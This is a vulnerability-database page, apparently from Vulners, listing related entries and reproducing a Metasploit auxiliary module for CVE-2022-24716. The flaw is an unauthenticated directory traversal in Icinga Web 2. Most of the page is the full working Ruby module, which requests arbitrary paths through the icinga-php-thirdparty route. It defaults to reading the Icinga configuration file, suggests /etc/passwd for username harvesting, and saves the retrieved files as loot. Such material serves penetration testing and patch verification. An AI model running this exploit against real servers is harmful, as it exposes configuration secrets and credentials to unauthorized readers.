Vulners
Lucene search
Icingaweb Directory Traversal In Static Library File Requests
🗓️ 01 Sep 2024 00:00:00Reported by h00die, Thomas Chauchefoin, Jacob Ebben, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 184 Views
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Icinga Web 2.10 - Arbitrary File Disclosure Exploit | 8 Apr 202300:00 | – | zdt |
 | Exploit for Path Traversal in Icinga Icinga_Web_2 | 19 Mar 202320:41 | – | githubexploit |
| Exploit for Path Traversal in Icinga Icinga_Web_2 | 26 Mar 202301:03 | – | githubexploit |
| Exploit for Path Traversal in Icinga Icinga_Web_2 | 27 Mar 202302:22 | – | githubexploit |
 | The vulnerability of the PHP framework Icinga Web 2, which allows a hacker to execute arbitrary code. | 12 Apr 202300:00 | – | bdu_fstec |
 | CVE-2022-24716 | 8 Mar 202222:40 | – | circl |
 | Icinga Web 2 路径遍历漏洞 | 8 Mar 202200:00 | – | cnnvd |
 | CVE-2022-24716 | 8 Mar 202200:00 | – | cve |
 | CVE-2022-24716 Path traversal in Icinga Web 2 | 8 Mar 202200:00 | – | cvelist |
 | CVE-2022-24716 | 8 Mar 202200:00 | – | debiancve |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Icingaweb Directory Traversal in Static Library File Requests',
'Description' => %q{
Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
unauthenticated directory traversal vulnerability. The vulnerability is triggered
through the icinga-php-thirdparty library, which allows unauthenticated users
to retrieve arbitrary files from the targets filesystem via a GET request to
/lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk> as the user
running the Icingaweb server, which will typically be the www-data user.
This can then be used to retrieve sensitive configuration information from the target
such as the configuration of various services, which may reveal sensitive login
or configuration information, the /etc/passwd file to get a list of valid usernames
for password guessing attacks, or other sensitive files which may exist as part of
additional functionality available on the target server.
This module was tested against Icingaweb 2.9.5 running on Docker.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Jacob Ebben', # EDB
'Thomas Chauchefoin' # initial POC and discovery
],
'References' => [
['EDB', '51329'],
['URL', 'https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/'],
['URL', 'https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw'],
['URL', 'https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d'],
['CVE', '2022-24716'],
],
'Targets' => [
['Icingaweb', {}],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
},
'DisclosureDate' => '2022-05-09',
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The URI of the Icinga Application', '/']),
OptString.new('FILE', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
]
)
end
def check_host(_ip)
res = send_request_cgi!(
'uri' => normalize_uri(target_uri.path)
)
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return Exploit::CheckCode::Unknown("#{peer} - Page didn't load correctly (response code: #{res.code}), check TARGETURI/port?") unless res.code == 200
return Exploit::CheckCode::Unknown("#{peer} - Page doesn't have a body, check TARGETURI/port?") if res.body.nil?
return Exploit::CheckCode::Detected("#{peer} - Icinga Web 2 found, unable to determine version.") if res.body.include?('<meta name="application-name" content="Icinga Web 2">')
return Exploit::CheckCode::Safe("#{peer} - Web server found, but couldn't detect Icinga")
end
def run_host(ip)
vprint_status('Attempting to retrieve file')
res = send_request_cgi!(
'uri' => normalize_uri(target_uri.path, 'lib', 'icinga', 'icinga-php-thirdparty', datastore['FILE'])
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly. Most likely file doesn't exist (response code: #{res.code})") unless res.code == 200
fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly, no body found") if res.body.nil?
if !res.body.empty?
print_good(res.body)
loot_path = store_loot('icinga file', 'text/plain', ip, res.body, datastore['FILE'])
print_good("#{datastore['FILE']} saved to #{loot_path}")
else
print_error('Response has 0 size.')
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.17.5
EPSS0.92546
SSVC